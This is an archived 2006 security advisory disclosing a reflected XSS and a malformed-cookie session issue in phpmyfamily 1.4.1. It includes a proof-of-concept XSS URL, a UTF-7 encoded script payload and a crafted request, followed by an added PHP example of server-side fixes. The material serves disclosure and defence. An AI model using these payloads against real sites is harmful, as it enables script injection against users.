HYSA-2006-007-phpmyfamily.txt

2006-04-01T00:00:00
ID PACKETSTORM:45064
Type packetstorm
Reporter matrix killer
Modified 2006-04-01T00:00:00

Description

------------------------------------------------------  
HYSA-2006-007 h4cky0u.org Advisory 016  
------------------------------------------------------  
Date - Mon March 27 2006  
  
  
TITLE:  
======  
  
phpmyfamily v1.4.1 CRLF injection & XSS  
  
  
SEVERITY:  
=========  
  
Medium  
  
  
SOFTWARE:  
=========  
  
phpmyfamily v1.4.1  
  
http://www.phpmyfamily.net/  
  
  
INFO:  
=====  
  
phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members to maintain a central database of research which is readily accessible and editable.  
  
  
DESCRIPTION:  
============  
  
--== CRLF Injection ==--  
  
GET /phpmyfamily/ HTTP/1.0  
Accept: */*  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)  
Host: 127.0.0.1:80  
Cookie: PHPSESSID=-4-2-=674sdasaf_  
Connection: Close  
  
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88  
  
You can try to encode <script>alert('matrix_killer');</script> in UTF-7 like this:  
  
+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer'); +ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-   
  
This way you can bypass the protection, but I'm not sure that it will work. For me it didn't, but I'm still a beginner with CRLF attacks.  
  
--== XSS ==--  
  
http://127.0.0.1/phpmyfamily/track.php?person=00001&name='><script>alert();</script>&email=1&action=sub&submit=Wy%B6lij  
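
Server-side handling that closes both issues shown above (the malformed PHPSESSID cookie and the reflected name parameter), as an added example that is not part of the original advisory and not phpmyfamily's own code. The function names are hypothetical and PHP 7 or later is assumed.

```php
<?php
// Added illustration; function names are hypothetical, not phpmyfamily's.

// True only for ids built from the characters PHP's warning lists as valid.
function session_id_is_valid(string $id): bool
{
    return preg_match('/\A[A-Za-z0-9,-]{1,128}\z/', $id) === 1;
}

// Use in place of a bare session_start(): a malformed or non-string cookie is
// replaced by a fresh random id, so PHP never parses the client's value.
function start_session_safely(): void
{
    ini_set('display_errors', '0'); // keep warnings and file paths out of responses
    $cookie = $_COOKIE[session_name()] ?? null;
    if ($cookie !== null && !(is_string($cookie) && session_id_is_valid($cookie))) {
        session_id(bin2hex(random_bytes(16))); // an id set here takes precedence over the cookie
    }
    session_start();
}

// Encode a request value before echoing it into HTML. ENT_QUOTES also encodes
// the single quote that the name= value above uses to close the attribute.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Declare the charset explicitly so the browser is not left to guess it,
// which is what a UTF-7 encoded payload depends on.
function send_html_headers(): void
{
    header('Content-Type: text/html; charset=UTF-8');
}

// Command-line self-check using the two values quoted in the advisory.
if (PHP_SAPI === 'cli') {
    var_dump(session_id_is_valid('-4-2-=674sdasaf_'));
    var_dump(html_escape("'><script>alert();</script>"));
}
```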
  
  
VENDOR STATUS:  
==============  
  
The vendor was contacted, but no response has been received to date.  
  
  
CREDITS:  
========  
  
This vulnerability was discovered and researched by matrix_killer of h4cky0u Security Forums.  
  
mail : matrix_k at abv.bg  
  
web : http://www.h4cky0u.org  
  
  
Co-Researcher:  
  
h4cky0u of h4cky0u Security Forums.  
  
mail : h4cky0u at gmail.com  
  
web : http://www.h4cky0u.org  
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
  
ORIGINAL ADVISORY:  
==================  
  
http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt  